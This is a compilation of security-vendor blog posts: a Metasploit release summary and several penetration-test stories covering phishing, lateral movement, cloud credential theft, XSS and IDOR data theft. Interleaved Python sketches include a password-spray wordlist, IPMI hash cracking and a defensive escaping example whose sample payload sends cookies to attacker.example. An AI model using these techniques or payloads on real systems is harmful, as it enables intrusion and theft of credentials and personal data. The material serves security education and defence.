Metasploit Wrap-Up 12/8/2023

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/08/metasploit-wrap-up-12-8-2023/

Are You Looking for ACTION?

Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!
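Conceptually, the new search matches a query against more of a module's metadata than just its name. Here is a minimal Python sketch of the idea; the data model and module entries are illustrative only, not Framework internals:

```python
# Sketch of metadata-aware module search: a query matches if it appears in a
# module's name, actions, targets, or aliases. Hypothetical data model.
MODULES = [
    {"name": "gather/owncloud_phpinfo_reader", "actions": ["read"],
     "targets": [], "aliases": []},
    {"name": "linux/local/docker_cgroup_escape", "actions": [],
     "targets": ["Unix In-Memory", "Linux Dropper"], "aliases": []},
]

def search(query, modules=MODULES):
    q = query.lower()
    def matches(mod):
        fields = [mod["name"]] + mod["actions"] + mod["targets"] + mod["aliases"]
        return any(q in f.lower() for f in fields)
    return [m["name"] for m in modules if matches(m)]
```

With the metadata included, a query like "dropper" finds the cgroup escape module even though the word never appears in its path.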

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a Docker container escape that yields root on the host OS.

Enhancements and features (5)

  • #17667 from h00die – Makes various performance and output readability improvements to Metasploit’s password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there are no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat’s username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner – This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y – This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds advanced detection logic (a check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary commands into the UPnP service via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 – Updates Metasploit’s Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 – Adds hierarchical search table support to Metasploit’s search command functionality. The search table now includes a module’s actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die – Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous – Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition, Metasploit Pro.

PenTales: What It’s Like on the Red Team

Post Syndicated from Aaron Herndon original https://blog.rapid7.com/2023/08/31/pentales-what-its-like-on-the-red-team/

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re sharing some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Performing a Red Team exercise at Rapid7 is a rollercoaster of emotions. The first week starts off with excitement and optimism, as you have a whole new client environment to dig into. All assets and employees are in-scope, no punches held. From a hacker mentality, it’s truly exciting to be unleashed with unlimited possibilities bouncing around in your head of how you’ll breach the perimeter, set persistence, laterally move, and access the company “crown jewels.”

Then the first week comes to a close and you’ve realized this company has locked down their assets, and short of developing and deploying a 0-day, you’re going to have to turn to other methods of entry such as social engineering. Excitement dies down but optimism remains, until that first phish is immediately burned. Then the second falls flat. Desperation to “win” kicks in and you find yourself working through the night, trying to find one seemingly non-existent issue in their network, all in the name of just getting that first foothold.

One of our recent Red Teams followed this emotional roller-coaster to a ‘T’. We were tasked with compromising a software development company with the end goal of obtaining access to their code repositories and cloud infrastructure. We had four weeks, two Rapid7 pen test consultants and a lot of Red Bull to hack all the things at our disposal. We spent the first two days performing Open Source Intelligence (OSINT) gathering. This phase was a method of passive reconnaissance, in which we scoured the internet for publicly accessible information about our target company. Areas of interest included public network ranges owned by the company, domain names, recent acquisitions, technologies used within the company, and employee contact information.

Our OSINT revealed that the company was cloud-first with a limited external footprint. They had a few HTTPS services with APIs for their customers, software download portals, customer ticketing systems, the usual. Email was cloud hosted in Office365, with Single Sign-On (SSO) handled through Okta and Multi-Factor Authentication (MFA) enforced. The only other external employee resources were an Extranet page that required authentication and a VPN portal that required MFA and a certificate.

After initial reconnaissance, we determined three possible points of entry: compromise one of the API endpoints, phish a user with a payload or MFA bypass, or guess a password and hope it can sign into something without MFA required. We spent our first two days combing over the customer’s product API documentation and testing for any endpoints which could be accessed without authentication or exploited to gain useful information. We were stonewalled here — kudos to the company.
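When combing an API surface for unauthenticated access, it helps to triage responses systematically rather than eyeball them. A rough Python sketch of that triage step, assuming probes have already been reduced to plain HTTP status codes (the endpoint paths are made up):

```python
# Sketch: triage unauthenticated API probes by HTTP status code.
# Endpoint paths are illustrative, not the client's real API.
def triage(results):
    """results: dict of endpoint -> status code from an unauthenticated request."""
    interesting = []
    for endpoint, status in results.items():
        if status == 200:
            interesting.append((endpoint, "accessible without auth"))
        elif status in (301, 302, 307, 308):
            interesting.append((endpoint, "redirect, check target"))
        # 401/403 mean authentication is enforced; nothing to chase there.
    return interesting

probes = {"/api/v1/docs": 200, "/api/v1/users": 401, "/api/v1/export": 403}
findings = triage(probes)
```

A stonewalled result, as on this engagement, is an empty findings list apart from intentionally public endpoints.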

Gone Phishin’

Our optimism and excitement was still high, however, as we set our eyes on plan B, phishing employees. We whipped up a basic phishing campaign that masqueraded as a new third-party employee compliance training portal. To bypass web content filtering, we purchased a recently expired domain that was categorized as “information/technology.” We then created a fake landing page with our new company logo and a “sign in with SSO” button.

Little did the employees realize that what they saw as their normal Okta login page was a proxy-phishing page built with Evilginx that captured their credentials and authenticated Okta session. The only noticeable difference was the URL. After capturing the employee’s Okta session, we redirected them back to our fake third-party compliance platform, where they were asked to download an HTML Application (HTA) file containing our payload.

We fired off this phishing campaign to 50 employee email addresses discovered online, ensuring that anyone with “information security” in their title was removed from the target list. Then we waited. One hour went by. Two. Three. No interactions with the campaign. The dread was starting to set in. We suspected that a day of hard work building the entire campaign had been eaten by a spam filter, or worse, identified, and the domain instantly blocked.

With defeat looming, we began preparing a second phishing campaign, when all of a sudden our TMUX session with Evilginx running showed a blob of green text. A valid credential was captured as well as an Okta session token. We held our breath as we switched to our Command and Control (C2) server dashboard, fingers crossed, and there it was. A callback from the phished user’s workstation. They opened the HTA on their workstation. It bypassed the EDR solution and executed our payload. We were in.

The thrill of establishing initial access is exhilarating. However, it’s at this moment that we have to take a deep breath and focus. Initial access by phishing is a fragile thing: if the user reports it, we’ll lose our shell. If we trip an alert within the EDR, we’ll lose our shell. If the user goes home for the night and restarts their computer before we can set persistence, we’ll lose our shell.

First things first, we quickly replaced our HTA payload on the phishing page with something benign in case the campaign was reported and the Security Operations Center (SOC) triaged the landing page. We can’t have them pulling Indicators of Compromise (IoCs) out of our payload and associating it with our initial access host in their environment. From here, one operator focused on setting persistence and identifying a lateral movement path while the other used the stolen Okta session tokens to review the user’s cloud applications before they expired. Three hours in and we still had access, reconnaissance was underway, and we had identified a few juicy Kerberoastable service accounts that, if cracked, would allow lateral movement.
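For context, "Kerberoastable" accounts are typically enabled accounts with a servicePrincipalName (SPN) set, because anyone on the domain can request a service ticket for them and attempt to crack it offline. A small Python sketch of the filtering step, over invented LDAP-style records:

```python
# Sketch: flag Kerberoastable accounts -- enabled accounts that have a
# servicePrincipalName set. Sample records are invented for illustration.
accounts = [
    {"sam": "svc_sql", "spns": ["MSSQLSvc/db01:1433"], "enabled": True},
    {"sam": "jsmith", "spns": [], "enabled": True},
    {"sam": "svc_old", "spns": ["HTTP/legacy01"], "enabled": False},
]

def kerberoastable(records):
    return [a["sam"] for a in records if a["spns"] and a["enabled"]]
```

Defensively, long random passwords on SPN-bearing service accounts (or group Managed Service Accounts) make the cracking step impractical.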

Things were going our way. And then it all came crashing down.

At what felt like a crescendo of success, we received another successful phish with credentials. We cracked the service account password that we had Kerberoasted, and… lost our initial access shell. Looking at the employee’s Teams messages, we saw the SOC asking about suspicious activity on their asset as they prepared to quarantine it. Deflated and tired, back to the drawing board we went. But, like all rollercoasters, we started going back uphill when we realized the most recent credentials captured were for an intern on the help desk team. While the tier one help desk employee didn’t have much access in the company, they could view all available employee support tickets in the SaaS ticketing solution. Smiling ear to ear, we assumed our role as the helpful company IT help desk.

Hi, We’re Here to Help

We quickly crafted a payload that utilized legitimate Microsoft binaries packaged alongside our malicious DLL, loaded in via AppDomain injection, and packaged nicely into an ISO. We then identified an employee who had submitted a ticket to the help desk asking for assistance with connecting to an internal application which was throwing an error. Taking a deep breath, we spoofed the help desk phone number and called the employee in need of assistance.

“Hi ma’am, this is Arthur from the IT help desk. We received your ticket regarding not being able to connect to the portal, and would like to troubleshoot it with you. Is this a good time?”

Note: you might be wondering what the employee could have done better here, but in the end, the responsibility lay with the company not having multi-factor on their help desk portal. It gave us the information we needed to answer any question the employee could ask, as the help desk.

The employee was thrilled to get assistance so quickly from the help desk. We even went the extra mile and spent time trying to troubleshoot the actual issue with the employee, receiving thanks for our efforts. Finally, we asked the employee to try applying “one last update” that may resolve the issue. We directed them to go to a website hosting our payload, download the ISO, open it, and run the “installer.” They obliged, as we had already built rapport throughout the entire call. Moments later, we had a shell on the employee’s workstation.

With a shell, cracked service account credentials, and all the noisy reconnaissance out of the way from our first shell, we dove right into the lateral movement. The service account allowed us to access an MSSQL server as an admin. We mounted the C$ drive of the server and identified already installed programs which utilized Microsoft’s .NET framework. We uploaded a malicious DLL and configuration file and remotely executed the installed program using Windows Management Instrumentation (WMI), again utilizing AppDomain injection to load our DLL. Success! We received a callback to our new C2 domain from the MSSQL server. Lateral movement hop number one, complete.

Using Rubeus, we checked for Kerberos tickets in memory and discovered a Ticket Granting Ticket (TGT) cached for a Domain Admin user. The TGT could be used in a Pass-the-Ticket (PTT) attack to authenticate as the account, which meant we had Domain Admin access until the ticket expired in approximately four more hours. Everything was flowing and we were ready for our next setback. But it didn’t come. Instead, we used the ticket to authenticate to the workstation of a cloud administrator and establish yet another shell on the host. Luckily for us, the company had everyone’s roles and titles in their Active Directory descriptions, and employee workstations also contained the associated employee name in the description field, which made identifying the cloud admin’s workstation a breeze.
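Hunting through AD description fields like that is a simple substring search once the objects are enumerated. A Python sketch with invented sample computer objects:

```python
# Sketch: locate a target employee's workstation by searching AD computer
# descriptions for the employee's name. Sample objects are invented.
computers = [
    {"name": "WKSTN-0142", "description": "Assigned to Dana Cruz (Cloud Administrator)"},
    {"name": "WKSTN-0388", "description": "Assigned to Lee Park (Accounting)"},
    {"name": "SRV-SQL01", "description": "Production MSSQL server"},
]

def find_workstations(employee, objects):
    needle = employee.lower()
    return [c["name"] for c in objects if needle in c["description"].lower()]
```

This is also why defenders are often advised to keep sensitive role information out of AD description fields, which are readable by any authenticated domain user by default.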

Using our shell on the cloud administrator’s workstation, we executed our own Chrome cookie extractor, “HomemadeChocolateChips,” in memory, which spawned Chrome with a debug port and extracted all cookies from the current user’s profile. This provided us with an Okta session token, which we used in conjunction with a SOCKS proxy through the employee’s machine to access their Okta dashboard sourced from an internal IP address. The company had it configured such that once authenticated to Okta, if coming from the company’s IP space, the Azure Okta chiclet did not prompt for MFA again. With a squeal of excitement, we were into their Azure Portal with admin privileges.

In Azure, there is a handy feature under a virtual machine’s configuration and operations tab called “Run Command.” This allows an administrator to do just as it states, run a PowerShell script on the virtual machine. As if it couldn’t get any easier, we identified a virtual machine labeled “Jenkins Build Server” with “Run Command” enabled. After running a quick PowerShell script to download our zip file with backdoored legitimate binaries, expand the archive, and then execute them, we established a C2 foothold on the build server. From there we found GitHub credentials utilized by build jobs, which let us access our objective: source code for company applications.

Exhausted but triumphant, with bags under our eyes and shaking from the caffeine-induced energy, we set up a few long-haul C2 connections to maintain persistent network access through the end of the assessment. We also met with the client to determine next steps, such as intentionally alerting their security team to the breach. Well, after a good beer and nap over the weekend, that is.

The preceding story was an amalgamation of several recent attack workflows to obfuscate client identity and showcase one cohesive assessment.

PenTales: A Badge, a Tag, and a Bunch of Unattended Chemicals; Why Physical Social Engineering Engagements are an Important Part of Security

Post Syndicated from Bennett Gogarty original https://blog.rapid7.com/2023/08/03/a-badge-a-tag-and-a-bunch-of-unattended-chemicals-why-physical-social-engineering-engagements-are-an-important-part-of-security/

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with performing a physical social engineering engagement for a pharmaceutical company. Physical social engineering penetration tests involve actually entering the physical space of the target. In this case, we were able to enter the facility via tailgating behind an unsuspecting employee.

After gaining access inside the client’s office space, I traversed multiple floors without having a valid RFID badge, thanks to even more tailgating and unassuming employees. When I reached an unattended conference room, I was able to plug a laptop into the network due to a lack of network access controls. I employed a tool called ‘Responder.py’ to perform Man-in-the-Middle (MitM) attacks by poisoning LLMNR/NBNS requests. This allowed me to gather usernames and password hashes for multiple employees, as well as perform ‘relay’ attacks. The password hashes were then placed on a password cracking server, and I let the relay attempts keep running for a bit before I exited the conference room to identify additional points of interest for the assessment. I was able to exit the building that first day without ever being stopped or questioned by anyone.

Upon my return the following day, I again tailgated into the facilities and returned to the same conference room to check the status of the password cracking attempts, only to discover that none of the hashes had cracked. Obviously, with more time and additional password cracking attempts, the results may have been different. Having been unsuccessful at this first attempt, I looked around for other ‘quick wins’ such as missing critical patches, but was unable to discover any attack paths that way.

While performing network testing, I noticed an employee hovering around outside the conference room door, only to quickly disappear after being seen. I continued testing for another few minutes before noticing the same employee nearby. While I was unable to ascertain the reason for this employee’s presence, to avoid compromising the operation I packed up my equipment and exited the conference room to focus on other goals that were prioritized over network testing.

Entering the Laboratory

Part of our task from the client was to see if I could gain access to multiple biology labs that stored several dangerous chemicals as well as expensive testing equipment. Turns out, it wasn’t terribly difficult. The first lab was completely unattended and I was able to enter thanks to a door that was not fully closed. The second lab was accessed compliments of a significant gap between the door’s plunger and strike plate, which allowed me to use my hotel room key to shim the door open. This gave me access to more dangerous (and dangerously unattended) chemicals. I then accessed the 5th floor labs through even more tailgating and unassuming employees. The 5th floor labs actually had people in them but nobody stopped and questioned me, a complete stranger. This pen test really highlights the benefits of Security Awareness Training and physical social engineering engagements!

The Boss’ Office

The final demonstration of impact came when the point-of-contact for the engagement asked if we could enter at least one of a few executives’ offices and leave a message on their dry erase board stating ‘I was here – A Pentester.’ After a little while, I got my chance to tag an executive’s office to really help demonstrate the impact/importance of security of all kinds, not just your network.

While making our way through our client’s office spaces on the last day, I was finally stopped and questioned. I informed this gentleman that I was working with [Point-of-Contact’s Name] performing a wireless survey of their networks. He informed me that he knew I worked for their company because I had a badge. Their badges did not contain a picture or any other information; they were totally blank. My badge was blank too (Pro Tip: don’t assume someone works there based on a blank RFID badge). I told this fella that it was good that he stopped and questioned me, because you never know who somebody is or if they are who they say they are. He completely agreed, shook my hand, and told me to have a nice day.

Few things highlight the need for robust employee security training more than a successful physical social engineering pen test. Ensuring your workforce is thinking critically about security goes beyond the ability to sniff out a phishing email and into securing the physical space they occupy. A good security plan is essential lest you be visited by a clandestine attacker.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

PenTales: There Are Many Ways to Infiltrate the Cloud

Post Syndicated from Arvind Vishwakarma original https://blog.rapid7.com/2023/07/27/pentales-there-are-many-ways-to-infiltrate-the-cloud/

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.

I evaluated their external assets, but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets; with cloud, once access has been blocked at the platform level, there is not a lot an attacker can do about it. Nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS apps, etc., using company-based keywords, for example: companyx, companyx.IT, companyx.media. Eventually, I found S3 buckets that were publicly available on their external network. These buckets contained sensitive information, which was a clear action item for the client.
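Keyword-based bucket hunting usually starts from simple name permutations on company keywords. A Python sketch of the candidate generation step; the suffix list is illustrative, and a real hunt would then check each name against S3:

```python
# Sketch: generate candidate S3 bucket names from a company keyword, the way
# the passive recon described above might. Suffix list is invented.
def bucket_candidates(company, suffixes=("it", "media", "backup", "dev")):
    names = [company]
    names += [f"{company}.{s}" for s in suffixes]
    names += [f"{company}-{s}" for s in suffixes]
    return names

candidates = bucket_candidates("companyx")
```

Because bucket names are global and guessable, the real control is the bucket policy: nothing sensitive should rely on the name being unknown.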

My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure, including the resources that were running, the roles attached to those resources, the open services, etc. It also provided the customer valuable insights into the security controls that were missing based on NIST’s best practices guide: unused access keys, unencrypted disk volumes, keys not rotated every 90 days, insufficient logging, publicly accessible services like SSH and RDP, and many more. This scan was done using Rapid7’s very own InsightCloudSec tool, which gives customers visibility into their cloud network and helps them identify gaps.

When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked down with a strong IAM policy that allowed viewing of cloud resources only. Attempts to enumerate weaknesses in the IAM policy turned up nothing. This will be important later on!

Hardcoded credentials were found in Function Apps and EC2 instance data, but I was unable to utilize them to escalate privileges. After enumerating the S3 buckets using the read-only credentials, multiple buckets containing customer invoices and payment data, along with Infrastructure-as-Code files, were found. This provided information about how the customer managed their automated deployments. Beyond this, we were unable to find any vulnerabilities to escalate privileges; however, all the data accumulated during this phase was kept handy in case there would be a chance to chain vulnerabilities together and gain access during the next phases of the pentest. Although it was frustrating not to find any way to escalate privileges from the platform itself, enumerating it gave me plenty of understanding about their environment, which would prove useful in the next phase.

In the final phase of the test, I tested all of the internal assets that were in scope. These were primarily Windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory Domain Controllers on these servers and found that some AD servers allowed NULL session enumeration, which means you could connect to the AD server and dump out all of the domain information, like users, groups, and password policies, without authentication.

Password spray attacks were deployed after all the users from the domain were enumerated. Pretty quickly, it was clear there were multiple users using weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials, allowing me to review the access levels granted to these accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD servers, which contained hashes for all the domain users. With this, several more accounts with weak passwords were cracked.
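Sprays like this lean on predictable seasonal and default passwords. A Python sketch that builds only the candidate list (a real spray must also throttle attempts per account to stay under lockout thresholds):

```python
# Sketch: build the kind of seasonal/default password list that succeeded
# here (Summer2023, Winter23, Password1). List contents are illustrative.
def spray_candidates(year):
    yy = str(year)[-2:]
    seasons = ["Spring", "Summer", "Autumn", "Winter"]
    passwords = [f"{s}{year}" for s in seasons]      # e.g. Summer2023
    passwords += [f"{s}{yy}" for s in seasons]       # e.g. Winter23
    passwords += ["Password1", f"Welcome{year}"]     # common defaults
    return passwords

candidates = spray_candidates(2023)
```

Banned-password lists and length-based password policies are the direct countermeasure to exactly this candidate set.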

With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. With all the data gathered from the AWS cloud platform test, I first looked at the EC2 Instances on the platform and what roles were assigned to each of them. Then I assessed accounts which had admin access. I found an ‘xx-main-ec2-prod’ role attached to an EC2 instance for which I had admin access through one of the compromised accounts. Using RDP to login to the EC2 instance, I pinged the IAM meta-data server and got the temporary AWS credentials for the ‘xx-main-ec2-prod’ role.
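The instance metadata service returns a role's temporary credentials as JSON from /latest/meta-data/iam/security-credentials/&lt;role-name&gt;. A Python sketch that parses a fabricated sample body into the keys an AWS profile needs (the credential values are invented; real responses carry live secrets):

```python
import json

# Sketch: parse the JSON the EC2 instance metadata service returns for an
# attached IAM role. The sample body below is fabricated for illustration.
sample = json.dumps({
    "Code": "Success",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLE",
    "SecretAccessKey": "examplesecret",
    "Token": "exampletoken",
    "Expiration": "2023-01-01T12:00:00Z",
})

def to_profile(body):
    creds = json.loads(body)
    return {
        "aws_access_key_id": creds["AccessKeyId"],
        "aws_secret_access_key": creds["SecretAccessKey"],
        "aws_session_token": creds["Token"],
    }

profile = to_profile(sample)
```

Requiring IMDSv2 (session-oriented metadata requests) and scoping instance roles tightly are the usual mitigations for this pivot.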

With these credentials, I created a new AWS profile and enumerated the permissions associated with this role. The ‘xx-main-ec2-prod’ role had access to list secrets in the AWS account, put and delete objects on all S3 buckets, send OS commands to all EC2 instances in the AWS account, and modify logs, as well. I proceeded to list some secrets in the AWS account to confirm the access that we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.

In the end, this testing highlights how vast the attack surface of a cloud network can be. Even if you’ve locked down your cloud platform, the infrastructure assets could be vulnerable, allowing attackers to compromise them and then laterally move to the cloud network. As organizations move their networks to the cloud, it is important for them not to simply depend on the cloud platform to secure their network, but also to ensure that their individual assets are continuously tested and secured.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

PenTales: Testing Security Health for a Healthcare Company

Post Syndicated from Aaron Tennison original https://blog.rapid7.com/2023/07/20/pentales-testing-security-health-for-a-healthcare-company/

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with testing a provider website in the healthcare industry. Providers had the ability on the website to apply for jobs, manage time cards, connect with employers needing help at hospitals, apply for contracts, as well as manage certificates and documents that were needed to perform duties. The client was interested to see if their web application had any flaws that could be leveraged by an attacker, as the application was heavily customized.

I began by testing input fields for any vulnerabilities. If an input field does not sanitize user input correctly this could open the web application for potential attacks that allow an attacker to inject code. The vulnerable form with injected code could then be used to attack the web application or target users. An input field can be anything that allows you to enter information into the web application, like your name or email address. I discovered a field that was not correctly sanitizing input and when submitted, was viewed by accounts with administrative access.

Using the leverage gained from the vulnerable field I was able to perform a Cross Site Scripting (XSS) attack which stores JavaScript in a vulnerable form and returns the JavaScript to users. When a user views a vulnerable form with injected code, the code is executed inside the victim’s browser. An XSS payload was created that, when viewed by users, sent a refresh token to a server under our control. This allowed us to collect administrative tokens for accounts that viewed the vulnerable form, resulting in account takeovers. I also discovered that the refresh token was misconfigured and allowed indefinite access to the web application once obtained. With said refresh token in hand I could log in to the account indefinitely even if the password was changed.
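The root cause here was rendering user input back to other users unencoded. A short defensive Python sketch showing how HTML-encoding on output neutralizes a stored XSS payload; the field and markup are illustrative:

```python
import html

# Defensive sketch: HTML-encode user input at output time so injected
# script renders as inert text instead of executing in the viewer's browser.
def render_comment(user_input):
    return f"<td>{html.escape(user_input)}</td>"

# An exfiltration-style payload like the one described above (attacker URL
# is a placeholder).
payload = '<script>fetch("https://attacker.example/?t="+document.cookie)</script>'
safe = render_comment(payload)
```

Short-lived, rotating refresh tokens bound to the session would also have limited the impact of any token that did leak.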

I then turned my attention to authorization issues on the web application. As a non-privileged user, I discovered a dashboard that allowed providers to view expiring documents. The request was vulnerable to Broken Object-Level Authorization and Insecure Direct Object Reference (IDOR), so I was able to manipulate the request to access streams of all uploaded documents for all end users with accounts on the web application. These documents included all healthcare documents uploaded to the application, including background checks, Social Security information, addresses, physician documents, and more.
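The fix for this class of IDOR is an object-level authorization check on every fetch: verify the requester owns the object (or holds an appropriate role) before returning it. A Python sketch with an invented data model:

```python
# Sketch: object-level authorization before serving a document. The store,
# IDs, and role model are invented for illustration.
DOCUMENTS = {
    101: {"owner": "provider_a", "name": "background_check.pdf"},
    102: {"owner": "provider_b", "name": "physician_license.pdf"},
}

def fetch_document(doc_id, requester, is_admin=False):
    doc = DOCUMENTS.get(doc_id)
    if doc is None:
        return None
    # The vulnerable application skipped this check entirely.
    if not is_admin and doc["owner"] != requester:
        raise PermissionError("not authorized for this object")
    return doc["name"]
```

The key design point is that the check uses the server-side owner record, never an identifier supplied by the client.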

Further analysis of the application showed that unprivileged users could access calls that were being utilized by administrative users. These calls disclosed sensitive information including usernames and passwords for vendors and staff associated with contracted hospitals on the application. As a non-privileged user account, I utilized this authorization issue in combination with an IDOR vulnerability to scrape usernames and passwords from the vulnerable endpoint for over 15,000 accounts in minutes.

Chasing a hunch that there would be more misconfigurations to exploit, I discovered that candidates for hospital positions at multiple locations had cleartext Social Security numbers stored in an administrative portion of the web application. An API endpoint was used to retrieve the information, and the endpoint was vulnerable to IDOR. I performed a brute force attack to retrieve names and cleartext Social Security numbers from hundreds of accounts being stored in the application.

This test highlighted issues present in a large number of web applications. We demonstrated just how quickly adversaries could exfiltrate sensitive data from an application that did not have safeguards in place, and just how important it is to sanitize user input correctly: failing to do so can put both users and the company at risk. Ensuring users are isolated and authorization is implemented appropriately is another major factor when operating in the healthcare industry, where protecting client data is critical when dealing with protected health information and personally identifiable information.

The client was shocked at the results of the test. It disclosed serious vulnerabilities that past testing by other security vendors had not discovered, highlighting the importance of continuous testing, especially for a customized application that is constantly evolving.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

Pentales: Old Vulns, New Tricks

Post Syndicated from Austin Guidry original https://blog.rapid7.com/2023/07/13/pentales-old-vulns-new-tricks/

Pentales: Old Vulns, New Tricks

At Rapid7 we love a good pentest story. So often they show the cleverness, skill, resilience, and dedication to our customers’ security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pentest desk and hopefully highlight some ways you can improve your own organization’s security.

This engagement began like any other Internal Network Penetration test. I followed a systematic methodology to enumerate the internal domain. The target organization was a financial institution, but their internal domain was administered via Active Directory (AD) like most organizations with more than a handful of computers. AD is a Microsoft product that provides centralized control of the whole gamut of networking devices that an organization may have. This may include workstations, servers, switches, routers, printers, and IoT devices. Additionally, AD can be used for localized, global, or cloud-based networks.

After enumeration, I identified high value targets and a wide range of open ports and services. I used a Metasploit RC file containing instructions and settings to configure Metasploit modules. This allowed me to scan the open ports and services for common/default credentials, vulnerabilities, misconfigurations, software types, version numbers, and other accessible information in the background while I covered more ground manually.

I began by investigating several types of combinable network vulnerabilities: broadcast name services (BNS) that could be poisoned, Server Message Block (SMB) signing statuses for hosts visible to my attack box, and Internet Protocol version 6 (IPv6) traffic. These are some of the more common ways to begin a successful attack path. I checked all of these options on this organization’s network, but found that I could not leverage BNS poisoning, hosts with SMB signing not required, or IPv6-based attacks.

Luckily, the Metasploit RC file found default credentials for Intelligent Platform Management Interface (IPMI) assets. The IPMI protocol’s design (specifically RAKP authentication in IPMI 2.0) introduced a vulnerability: during authentication, the device hands a salted hash of the account’s password to anyone who attempts to log in with a valid username. The Metasploit module for dumping IPMI hashes does exactly this for a wordlist of common usernames and checks the returned hashes against a short list of common passwords like “admin” and “root.” In this case, several devices were using credentials such as “admin:admin” and “root:root.”
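The offline check at the heart of this technique can be sketched in a few lines. This is a simplified model: the blob below is an illustrative stand-in for the RAKP session data, not the exact wire format the BMC uses:

```python
import hashlib
import hmac

# In RAKP, the BMC returns HMAC-SHA1 keyed with the account password over the
# session IDs, nonces, device GUID, role, and username, so every candidate
# password can be tested offline against a single captured response.

def rakp_hmac(password, session_blob):
    return hmac.new(password.encode(), session_blob, hashlib.sha1).digest()

def crack(captured_hmac, session_blob, wordlist):
    for candidate in wordlist:
        if hmac.compare_digest(rakp_hmac(candidate, session_blob), captured_hmac):
            return candidate
    return None

blob = b"\x01" * 56 + b"admin"       # stand-in for the captured session data
captured = rakp_hmac("admin", blob)  # what the BMC would have disclosed
print(crack(captured, blob, ["root", "password", "admin"]))  # admin
```

Because the device volunteers the HMAC, no interaction beyond the initial exchange is needed; the guessing happens entirely on the attacker’s hardware.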

This is exciting because IPMI is used to control servers, and more often these days server virtualization is such that several server virtual machines (VMs) are hosted on one physical server computer. I logged into the web interfaces associated with these IPMIs and found within the remote consoles that three of these IPMI assets were hosting VMware ESXi instances. VMware ESXi is, in fact, used to host and manage multiple VMs. The remote consoles provided the IP and website addresses for the VMware ESXi administrative login interfaces. I navigated to these interfaces and typed in the default credentials used on the IPMI hosts… and they were valid!

At this point, I was quite shocked that default credentials were in use, some 4+ decades after “admin:admin” became an official vulnerability. Not to mention, default credentials to valuable assets is probably the simplest and easiest vulnerability to exploit.

